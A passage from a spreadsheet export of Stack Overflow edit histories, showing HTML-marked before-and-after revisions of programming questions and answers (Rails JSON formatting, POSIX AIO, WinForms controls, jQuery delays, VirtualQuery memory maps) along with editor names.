 &lt;p&gt;&lt;span class="diff-delete"&gt; "&lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Real programmers set the universal constants at the start such that the universe evolves to contain a disk with the data they want."&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Religious debates are always fun!&lt;/p&gt; _x000D_
 &lt;a href="http://xkcd.com/378/" rel="nofollow noreferrer"&gt; http://imgs.xkcd.com/comics/real_programmers.png &lt;/a&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Matt</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like my &lt;a href="http://www.json.org" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;JSON&lt;/span&gt;&lt;/a&gt; output in &lt;code&gt;&lt;span class="diff-delete"&gt;Rails&lt;/span&gt;&lt;/code&gt; to be &lt;em&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;pretty&lt;/span&gt;&lt;/code&gt;&lt;/em&gt; or nicely formatted.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Right&lt;/span&gt; now, I call the &lt;code&gt;to_json&lt;/code&gt; method and my &lt;code&gt;&lt;span class="diff-delete"&gt;JSON&lt;/span&gt;&lt;/code&gt; is all on one line. &lt;span class="diff-delete"&gt;At&lt;/span&gt; times&lt;span class="diff-delete"&gt;,&lt;/span&gt; this can be difficult to see if there is a problem in the &lt;code&gt;&lt;span class="diff-delete"&gt;JSON&lt;/span&gt;&lt;/code&gt; output stream.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there&lt;span class="diff-delete"&gt; a&lt;/span&gt; way to configure or a method to make my &lt;code&gt;&lt;span class="diff-delete"&gt;JSON&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;em&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;pretty&lt;/span&gt;&lt;/code&gt;&lt;/em&gt; or nicely formatted in &lt;code&gt;&lt;span class="diff-delete"&gt;Rails&lt;/span&gt;&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I would like my &lt;span class="diff-add"&gt;JSON&lt;/span&gt; output in &lt;span class="diff-add"&gt;Ruby on Rails&lt;/span&gt; to be &lt;span class="diff-add"&gt;"pretty"&lt;/span&gt; or nicely formatted.&lt;span class="diff-add"&gt; Right&lt;/span&gt; now, I call the &lt;code&gt;to_json&lt;/code&gt; method and my &lt;span class="diff-add"&gt;JSON&lt;/span&gt; is all on one line. &lt;span class="diff-add"&gt; At&lt;/span&gt; times this can be difficult to see if there is a problem in the &lt;span class="diff-add"&gt;JSON&lt;/span&gt; output stream.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there way to configure or a method to make my &lt;span class="diff-add"&gt;JSON "pretty"&lt;/span&gt; or nicely formatted in &lt;span class="diff-add"&gt;RoR&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Andrew T.</t>
  </si>
  <si>
    <t>Lahiru</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Update: Due to newer security restrictions, this approach does not work for IE10+&lt;/span&gt;&lt;/strong&gt;,&lt;span class="diff-delete"&gt; but&lt;/span&gt; you can do this from the parent window:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var thisIsAnObject = {foo:'bar'};_x000D_
var w = window.open("http://example.com");_x000D_
w.myVariable = thisIsAnObject;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Recommended approach (works in all browsers as of 2015)&lt;/span&gt;&lt;/strong&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var myVariable = window.opener.thisIsAnObject;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I prefer the &lt;span class="diff-delete"&gt;latter&lt;/span&gt;, because you will probably need to wait for the new page to load anyway, so that you can access its elements, or whatever you want.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Putting code to the matter&lt;/span&gt;, you can do this from the parent window:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var thisIsAnObject = {foo:'bar'};_x000D_
var w = window.open("http://example.com");_x000D_
w.myVariable = thisIsAnObject;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; or this from the new window&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;var myVariable = window.opener.thisIsAnObject;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I prefer the &lt;span class="diff-add"&gt;later&lt;/span&gt;, because you will probably need to wait for the new page to load anyway, so that you can access its elements, or whatever you want.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Victor</t>
  </si>
  <si>
    <t>jdhildeb</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There are pages scattered around the web that describe POSIX AIO facilities in varying amounts of detail. None of them are terribly recent. It's not clear what, exactly, they're describing. For example, the "official" (?) &lt;a href="http://lse.sourceforge.net/io/aio.html" rel="nofollow noreferrer"&gt;web site for Linux kernel asynchronous I/O support here&lt;/a&gt; says that sockets don't work, but the "aio.h" manual pages on my Ubuntu 8.04.1 workstation all seem to imply that it works for arbitrary file descriptors. Then there's &lt;a href="http://www.bullopensource.org/posix/" rel="nofollow noreferrer"&gt;another project that seems to work at the library layer&lt;/a&gt; with even less documentation.&lt;/p&gt; _x000D_
 &lt;p&gt; I'd like to know:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; What is the purpose of POSIX AIO? Given that the most obvious example of an implementation I can find says it doesn't support sockets, the whole thing seems weird to me. Is it just for async disk I/O? If so, why the hyper-general API? If not, why is disk I/O the first thing that got attacked?&lt;/li&gt; _x000D_
  &lt;li&gt; Where are there &lt;span class="diff-delete"&gt;examples of&lt;/span&gt; &lt;em&gt;complete&lt;/em&gt; POSIX AIO programs that I can look at?&lt;/li&gt; _x000D_
  &lt;li&gt; Does anyone actually use it, for real?&lt;/li&gt; _x000D_
  &lt;li&gt; What platforms support POSIX AIO? What parts of it do they support? Does anyone really support the implied "Any I/O to any FD" that &lt;code&gt;&amp;lt;aio.h&amp;gt;&lt;/code&gt; seems to promise?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The other multiplexing mechanisms available to me are perfectly &lt;span class="diff-delete"&gt;fine&lt;/span&gt;, but the random fragments of information floating around &lt;span class="diff-delete"&gt;on the internet&lt;/span&gt; have made me curious.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There are pages scattered around the web that describe POSIX AIO facilities in varying amounts of detail. None of them are terribly recent. It's not clear what, exactly, they're describing. For example, the "official" (?) &lt;a href="http://lse.sourceforge.net/io/aio.html" rel="nofollow noreferrer"&gt;web site for Linux kernel asynchronous I/O support here&lt;/a&gt; says that sockets don't work, but the "aio.h" manual pages on my Ubuntu 8.04.1 workstation all seem to imply that it works for arbitrary file descriptors. Then there's &lt;a href="http://www.bullopensource.org/posix/" rel="nofollow noreferrer"&gt;another project that seems to work at the library layer&lt;/a&gt; with even less documentation.&lt;/p&gt; _x000D_
 &lt;p&gt; I'd like to know:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; What is the purpose of POSIX AIO? Given that the most obvious example of an implementation I can find says it doesn't support sockets, the whole thing seems weird to me. Is it just for async disk I/O? If so, why the hyper-general API? If not, why is disk I/O the first thing that got attacked?&lt;/li&gt; _x000D_
  &lt;li&gt; Where are there &lt;span class="diff-add"&gt;example&lt;/span&gt; &lt;em&gt;complete&lt;/em&gt; POSIX AIO programs that I can look at?&lt;/li&gt; _x000D_
  &lt;li&gt; Does anyone actually use it, for real?&lt;/li&gt; _x000D_
  &lt;li&gt; What platforms support POSIX AIO? What parts of it do they support? Does anyone really support the implied "Any I/O to any FD" that &lt;code&gt;&amp;lt;aio.h&amp;gt;&lt;/code&gt; seems to promise?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The other multiplexing mechanisms available to me are perfectly &lt;span class="diff-add"&gt;good&lt;/span&gt;, but the random fragments of information floating around &lt;span class="diff-add"&gt;out there&lt;/span&gt; have made me curious.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Glyph</t>
  </si>
  <si>
    <t>Greenbeard</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Then&lt;/span&gt; I can solidify 2 more ticks on the Joel test.&lt;/p&gt; _x000D_
 &lt;p&gt; I've implemented build automation using a makefile and a python script already and I understand the basics and the options.&lt;/p&gt; _x000D_
 &lt;p&gt; But how can I, the new guy who reads the blogs, convince my cohort of its inherent efficacy?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;The title should say it all, then&lt;/span&gt; I can solidify 2 more ticks on the Joel test.&lt;/p&gt; _x000D_
 &lt;p&gt; I've implemented build automation using a makefile and a python script already and I understand the basics and the options.&lt;/p&gt; _x000D_
 &lt;p&gt; But how can I, the new guy who reads the blogs, convince my cohort of its inherent efficacy?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Peter Turner</t>
  </si>
  <si>
    <t>ThinkingStiff</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;throw ex;&lt;/code&gt; will erase your &lt;span class="diff-delete"&gt;Stack Trace&lt;/span&gt;. Don't do this unless you mean to clear the &lt;span class="diff-delete"&gt;Stack Trace&lt;/span&gt;. Just use &lt;code&gt;throw;&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;code&gt;throw ex;&lt;/code&gt; will erase your &lt;span class="diff-add"&gt;stacktrace&lt;/span&gt;. Don't do this unless you mean to clear the &lt;span class="diff-add"&gt;stacktrace&lt;/span&gt;. Just use &lt;code&gt;throw;&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you didn't have the ability to alter the warning levels, you could just bind the parameter value to a dummy value and document that they are for future use&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; If you didn't have the ability to alter the warning levels, you could just bind the parameter value to a dummy value and document that they are for future use&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>abliss</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have tracked down a lot of issues with UIs not unloading as expected in WinForms.&lt;/p&gt; _x000D_
 &lt;p&gt; Here are some general hints:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; alot of the time, a control will stay in use because controls events are not properly removed (the tooltip provider caused us really large issues here) or the controls are not properly Disposed.&lt;/li&gt; _x000D_
  &lt;li&gt; use 'using' blocks around all modal dialogs to ensure that they are Disposed&lt;/li&gt; _x000D_
  &lt;li&gt; there are some control properties that will force the creation of the window handle before it is necessary (for example setting the ReadOnly property of a TextBox control will force the control to be realized)&lt;/li&gt; _x000D_
  &lt;li&gt; use a tool like the &lt;a href="http://memprofiler.com/Default.aspx" rel="nofollow noreferrer"&gt;.Net Memory profiler&lt;/a&gt; to get counts of the classes that are created. Newer versions of this tool will also track GDI and USER objects.&lt;span class="diff-delete"&gt; Or simply open TaskMgr.exe and choose View menu &amp;gt; Select Columns and add USER Objects, GDI Objects and Handles&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; try to minimize your use of Win API calls (or other DllImport calls). If you do need to use interop, try to wrap these calls in such a way that the using/Dispose pattern will work correctly.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have tracked down a lot of issues with UIs not unloading as expected in WinForms.&lt;/p&gt; _x000D_
 &lt;p&gt; Here are some general hints:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; alot of the time, a control will stay in use because controls events are not properly removed (the tooltip provider caused us really large issues here) or the controls are not properly Disposed.&lt;/li&gt; _x000D_
  &lt;li&gt; use 'using' blocks around all modal dialogs to ensure that they are Disposed&lt;/li&gt; _x000D_
  &lt;li&gt; there are some control properties that will force the creation of the window handle before it is necessary (for example setting the ReadOnly property of a TextBox control will force the control to be realized)&lt;/li&gt; _x000D_
  &lt;li&gt; use a tool like the &lt;a href="http://memprofiler.com/Default.aspx" rel="nofollow noreferrer"&gt;.Net Memory profiler&lt;/a&gt; to get counts of the classes that are created. Newer versions of this tool will also track GDI and USER objects.&lt;/li&gt; _x000D_
  &lt;li&gt; try to minimize your use of Win API calls (or other DllImport calls). If you do need to use interop, try to wrap these calls in such a way that the using/Dispose pattern will work correctly.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jeremy Thompson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What I'd like to know is if there is a nice way to queue jQuery functions to execute after a set amount of time. This wouldn't pause the execution of other functions, just the ones following in the chain. Perhaps an example of what I'd envisage it would look like would illustrate:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$('#alert')_x000D_
    .show()_x000D_
    .wait(5000)    // &amp;lt;-- this bit_x000D_
    .hide()_x000D_
;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I know that it's possible by using &lt;code&gt;&lt;span class="diff-delete"&gt;timeouts&lt;/span&gt;&lt;/code&gt;, but it seems like that's a messy way to do it, especially compared to the above example (if it were real).&lt;/p&gt; _x000D_
 &lt;p&gt; So, is something like this already built-in to jQuery, and if not, what is the best way to emulate it?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What I'd like to know is if there is a nice way to queue jQuery functions to execute after a set amount of time. This wouldn't pause the execution of other functions, just the ones following in the chain. Perhaps an example of what I'd envisage it would look like would illustrate:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;$('#alert')_x000D_
    .show()_x000D_
    .wait(5000)    // &amp;lt;-- this bit_x000D_
    .hide()_x000D_
;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I know that it's possible by using &lt;span class="diff-add"&gt;timeouts&lt;/span&gt;, but it seems like that's a messy way to do it, especially compared to the above example (if it were real).&lt;/p&gt; _x000D_
 &lt;p&gt; So, is something like this already built-in to jQuery, and if not, what is the best way to emulate it?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>nickf</t>
  </si>
  <si>
    <t>gprathour</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;This&lt;/span&gt; class &lt;span class="diff-delete"&gt;inherits TextBox&lt;/span&gt;. &lt;span class="diff-delete"&gt;Whenever text is changed it checks for fit&lt;/span&gt; to &lt;span class="diff-delete"&gt;enable/disable scrollbars&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;using System;_x000D_
using System.Drawing;_x000D_
using System.Windows.Forms;_x000D_
_x000D_
public class MyTextBox : TextBox {_x000D_
  private bool mScrollbars;_x000D_
  public MyTextBox() {_x000D_
    this.Multiline = true;_x000D_
    this.ReadOnly = true;_x000D_
  }_x000D_
  private void checkForScrollbars() {_x000D_
    bool scroll = false;_x000D_
    int cnt = this.Lines.Length;_x000D_
    if (cnt &amp;gt; 1) {_x000D_
      int pos0 = this.GetPositionFromCharIndex(this.GetFirstCharIndexFromLine(0)).Y;_x000D_
      if (pos0 &amp;gt;= 32768) pos0 -= 65536;_x000D_
      int pos1 = this.GetPositionFromCharIndex(this.GetFirstCharIndexFromLine(1)).Y;_x000D_
      if (pos1 &amp;gt;= 32768) pos1 -= 65536;_x000D_
      int h = pos1 - pos0;_x000D_
      scroll = cnt * h &amp;gt; (this.ClientSize.Height - 6);  // 6 = padding_x000D_
    }_x000D_
    if (scroll != mScrollbars) {_x000D_
      mScrollbars = scroll;_x000D_
      this.ScrollBars = scroll ? ScrollBars.Vertical : ScrollBars.None;_x000D_
    }_x000D_
  }_x000D_
_x000D_
  protected override void OnTextChanged(EventArgs e) {_x000D_
    checkForScrollbars();_x000D_
    base.OnTextChanged(e);_x000D_
  }_x000D_
_x000D_
  protected override void OnClientSizeChanged(EventArgs e) {_x000D_
    checkForScrollbars();_x000D_
    base.OnClientSizeChanged(e);_x000D_
  }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Add a new&lt;/span&gt; class &lt;span class="diff-add"&gt;to your project and paste the code shown below&lt;/span&gt;. &lt;span class="diff-add"&gt; Compile. Drop the new control from the top of the toolbox onto your form. It's not quite perfect but ought&lt;/span&gt; to &lt;span class="diff-add"&gt;work for you&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;using System;_x000D_
using System.Drawing;_x000D_
using System.Windows.Forms;_x000D_
_x000D_
public class MyTextBox : TextBox {_x000D_
  private bool mScrollbars;_x000D_
  public MyTextBox() {_x000D_
    this.Multiline = true;_x000D_
    this.ReadOnly = true;_x000D_
  }_x000D_
  private void checkForScrollbars() {_x000D_
    bool scroll = false;_x000D_
    int cnt = this.Lines.Length;_x000D_
    if (cnt &amp;gt; 1) {_x000D_
      int pos0 = this.GetPositionFromCharIndex(this.GetFirstCharIndexFromLine(0)).Y;_x000D_
      if (pos0 &amp;gt;= 32768) pos0 -= 65536;_x000D_
      int pos1 = this.GetPositionFromCharIndex(this.GetFirstCharIndexFromLine(1)).Y;_x000D_
      if (pos1 &amp;gt;= 32768) pos1 -= 65536;_x000D_
      int h = pos1 - pos0;_x000D_
      scroll = cnt * h &amp;gt; (this.ClientSize.Height - 6);  // 6 = padding_x000D_
    }_x000D_
    if (scroll != mScrollbars) {_x000D_
      mScrollbars = scroll;_x000D_
      this.ScrollBars = scroll ? ScrollBars.Vertical : ScrollBars.None;_x000D_
    }_x000D_
  }_x000D_
_x000D_
  protected override void OnTextChanged(EventArgs e) {_x000D_
    checkForScrollbars();_x000D_
    base.OnTextChanged(e);_x000D_
  }_x000D_
_x000D_
  protected override void OnClientSizeChanged(EventArgs e) {_x000D_
    checkForScrollbars();_x000D_
    base.OnClientSizeChanged(e);_x000D_
  }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Aidan Ryan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Some sample code:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  public partial class Form1 : Form {_x000D_
    public Form1() {_x000D_
      InitializeComponent();_x000D_
      this.AllowDrop = true;_x000D_
      this.DragEnter += new DragEventHandler(Form1_DragEnter);_x000D_
      this.DragDrop += new DragEventHandler(Form1_DragDrop);_x000D_
    }_x000D_
_x000D_
    void Form1_DragEnter(object sender, DragEventArgs e) {_x000D_
      if (e.Data.GetDataPresent(DataFormats.FileDrop)) &lt;span class="diff-delete"&gt;_x000D_
         &lt;/span&gt;e.Effect = DragDropEffects.Copy;_x000D_
    }_x000D_
_x000D_
    void Form1_DragDrop(object sender, DragEventArgs e) {_x000D_
      string[] files = (string[])e.Data.GetData(DataFormats.FileDrop);_x000D_
      foreach (string file in files)&lt;span class="diff-delete"&gt;_x000D_
        &lt;/span&gt; Console.WriteLine(file);_x000D_
    }_x000D_
  }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Some sample code:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  public partial class Form1 : Form {_x000D_
    public Form1() {_x000D_
      InitializeComponent();_x000D_
      this.AllowDrop = true;_x000D_
      this.DragEnter += new DragEventHandler(Form1_DragEnter);_x000D_
      this.DragDrop += new DragEventHandler(Form1_DragDrop);_x000D_
    }_x000D_
_x000D_
    void Form1_DragEnter(object sender, DragEventArgs e) {_x000D_
      if (e.Data.GetDataPresent(DataFormats.FileDrop)) e.Effect = DragDropEffects.Copy;_x000D_
    }_x000D_
_x000D_
    void Form1_DragDrop(object sender, DragEventArgs e) {_x000D_
      string[] files = (string[])e.Data.GetData(DataFormats.FileDrop);_x000D_
      foreach (string file in files) Console.WriteLine(file);_x000D_
    }_x000D_
  }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Igor Brejc</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When I start my process from VS, it is always created inside a job object. I would like to know how to turn this behaviour off. Any ideas?&lt;/p&gt; _x000D_
 &lt;p&gt; I expect that it is created in a job object to be debugged. I want to place my program in a different job object.&lt;/p&gt; _x000D_
 &lt;p&gt; It's not the hosting process. I'm talking about a &lt;a href="http://msdn.microsoft.com/en-us/library/ms684161(VS.85).aspx" rel="nofollow noreferrer"&gt;Job Object&lt;/a&gt;. This is an unmanaged C++ application.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Please do not vote up &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/89791/how-to-stop-the-visual-studio-debugger-starting-my-process-in-a-job-object#89818"&gt;&lt;span class="diff-delete"&gt;the answer by sphereinabox&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;. It is plainly the wrong answer.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; When I start my process from VS, it is always created inside a job object. I would like to know how to turn this behaviour off. Any ideas?&lt;/p&gt; _x000D_
 &lt;p&gt; I expect that it is created in a job object to be debugged. I want to place my program in a different job object.&lt;/p&gt; _x000D_
 &lt;p&gt; It's not the hosting process. I'm talking about a &lt;a href="http://msdn.microsoft.com/en-us/library/ms684161(VS.85).aspx" rel="nofollow noreferrer"&gt;Job Object&lt;/a&gt;. This is an unmanaged C++ application.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>1800 INFORMATION</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Microsoft already has a very good &lt;a href="http://msdn.microsoft.com/en-us/goglobal/bb688096" rel="nofollow noreferrer"&gt;tutorial&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Edit:&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; The orignal link above is broken. Try this link instead: &lt;/span&gt;&lt;a href="http://msdn.microsoft.com/en-us/goglobal/bb688110" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Globalization Step-by-Step&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Microsoft already has a very good &lt;a href="http://msdn.microsoft.com/en-us/goglobal/bb688096" rel="nofollow noreferrer"&gt;tutorial&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Nescio</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; we all writing code for single processor. i wonder when we all are able to write code on multi processors?&lt;/p&gt; _x000D_
 &lt;p&gt; what do we need (software tools, logic, algorithms) for this switching?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; we all writing code for single processor. i wonder when we all are able to write code on multi processors?&lt;/p&gt; _x000D_
 &lt;p&gt; what do we need (software tools, logic, algorithms) for this switching?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; edit: in my view, as we do many task parallely, same way we need to convert those real life solutions(algorithms) to computer lang. just as OOPs coding did for procedural coding. OOPs is more real life coding style than procedural one. so i hope for that kind of solutions.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>K. Santosh</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use existing memory debugging tools for this, I found &lt;a href="http://www.vmvalidator.com/cpp/memory/index.html" rel="nofollow noreferrer" title="Memory Validator"&gt;1&lt;/a&gt; quite useful, it is able to track both API level (heap, new...) and OS level (Virtual Memory) allocations and show virtual memory maps.&lt;/p&gt; _x000D_
 &lt;p&gt; The other option which I also found very usefull is to be able to dump a map of the whole virtual space based on VirtualQuery function. My code for this looks like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void PrintVMMap()_x000D_
{_x000D_
  size_t start = 0;_x000D_
  // TODO: make portable - not compatible with /3GB, 64b OS or 64b app_x000D_
  size_t end = 1U&amp;lt;&amp;lt;31; // map 32b user space only - kernel space not accessible_x000D_
  SYSTEM_INFO si;_x000D_
  GetSystemInfo(&amp;amp;si);_x000D_
  size_t pageSize = si.dwPageSize;_x000D_
  size_t longestFreeApp = 0;_x000D_
  _x000D_
  int index=0;_x000D_
  for (size_t addr = start; addr&amp;lt;end; )_x000D_
  {_x000D_
    MEMORY_BASIC_INFORMATION buffer;_x000D_
    SIZE_T retSize = VirtualQuery((void *)addr,&amp;amp;buffer,sizeof(buffer));_x000D_
    if (retSize==sizeof(buffer) &amp;amp;&amp;amp; buffer.RegionSize&amp;gt;0)_x000D_
    {_x000D_
      // dump information about this region_x000D_
      printf(.... some buffer information here ....);_x000D_
      // track longest feee region - usefull fragmentation indicator_x000D_
      if (buffer.State&amp;amp;MEM_FREE)_x000D_
      {_x000D_
        if (buffer.RegionSize&amp;gt;longestFreeApp) longestFreeApp = buffer.RegionSize;_x000D_
      }_x000D_
      addr += buffer.RegionSize;_x000D_
      index+= buffer.RegionSize/pageSize;_x000D_
    }_x000D_
    else_x000D_
    {_x000D_
      // always proceed_x000D_
      addr += pageSize;_x000D_
      index++;_x000D_
    }_x000D_
  }_x000D_
  printf("Longest free VM region: %d",longestFreeApp);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can use existing memory debugging tools for this, I found&lt;span class="diff-add"&gt; Memory Validator&lt;/span&gt; &lt;a href="http://www.vmvalidator.com/cpp/memory/index.html" rel="nofollow noreferrer" title="Memory Validator"&gt;1&lt;/a&gt; quite useful, it is able to track both API level (heap, new...) and OS level (Virtual Memory) allocations and show virtual memory maps.&lt;/p&gt; _x000D_
 &lt;p&gt; The other option which I also found very usefull is to be able to dump a map of the whole virtual space based on VirtualQuery function. My code for this looks like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void PrintVMMap()_x000D_
{_x000D_
  size_t start = 0;_x000D_
  // TODO: make portable - not compatible with /3GB, 64b OS or 64b app_x000D_
  size_t end = 1U&amp;lt;&amp;lt;31; // map 32b user space only - kernel space not accessible_x000D_
  SYSTEM_INFO si;_x000D_
  GetSystemInfo(&amp;amp;si);_x000D_
  size_t pageSize = si.dwPageSize;_x000D_
  size_t longestFreeApp = 0;_x000D_
  _x000D_
  int index=0;_x000D_
  for (size_t addr = start; addr&amp;lt;end; )_x000D_
  {_x000D_
    MEMORY_BASIC_INFORMATION buffer;_x000D_
